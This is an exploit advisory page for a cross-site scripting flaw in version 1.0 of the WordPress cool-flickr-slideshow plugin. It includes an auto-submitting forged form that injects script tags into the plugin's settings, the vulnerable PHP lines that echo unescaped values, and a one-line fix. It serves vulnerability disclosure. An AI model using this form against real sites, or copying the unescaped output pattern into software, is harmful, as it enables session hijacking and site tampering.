Wordpress cool-flickr-slideshow Plugin Cross Site Scripting(xss)

2017.09.07
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

___________________________________________________ | | Exploit Title: Wordpress cool-flickr-slideshow Plugin Cross Site Scripting(xss) | Exploit Author: Ashiyane Digital security Team | Vendor Homepage:https://wordpress.org/plugins/cool-flickr-slideshow/ | Software Link: https://downloads.wordpress.org/plugin/cool-flickr-slideshow.1.0.zip | Version: 1.0 | Date: 2017 - 07 - 9 | Tested on: Kali-Linux /FireFox |__________________________________________________ Exploit : <form name="form1" method="POST" Action="http://127.0.0.1/wordpress/wp-admin/admin.php?page=flickr-gallery-settings"> <input type="hidden" name="flickr-gallery_hidden" value="Y" /> <input type="hidden" name="flickr_type" value=""><script>alert("xss1")</script>" /> <input type="hidden" name="flickr_uid" value="1" /> <input type="hidden" name="flickr_api" value="MMM" /> <input type="hidden" name="flickr_groupid" value='1' /> <input type="hidden" name="flickr_set" value="" /> <input type="hidden" name="flickr_width" value='"><script>alert("xss 2")</script>' /> <input type="hidden" name="flickr_height" value='"><script>alert("xss 3")</script>' /> <input type="hidden" name="Submit" value="Save" /> </form> <script language="javascript"> setTimeout('form1.submit()', 1); </script> __________________________________________________ Vulnerable File : /wp-content/plugins/cool-flickr-slideshow/flickr_gallery_admin.php Vulnerable code: line 154 : <select id="flickr_type" name="flickr_type" onchange="javascript:ChangeFlickrType(this.value);"> <option selected="" value=""/><script>alert(1000)</script>">SELECT</option> <option value="user">User</option> <option value="group">Group</option> <option value="set">Set</option> <option value="api">API</option> </select> line 185 : <p><span style="width: 75px;float: left;"><?php _e("Width: " ); ?> </span><input type="text" name="flickr_width" value="<?php echo $flickr_width; ?>" size="20"></p> line 186 : <p><span style="width: 75px;float: left;"><?php _e("Height: " ); ?> </span><input type="text" name="flickr_height" value="<?php echo $flickr_height; ?>" size="20"></p> __________________________________________________ #patch: For fix this vulnerability you use htmlspecialchars() function . __________________________________________________ Discovered By : M.R.S.L.Y __________________________________________________


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top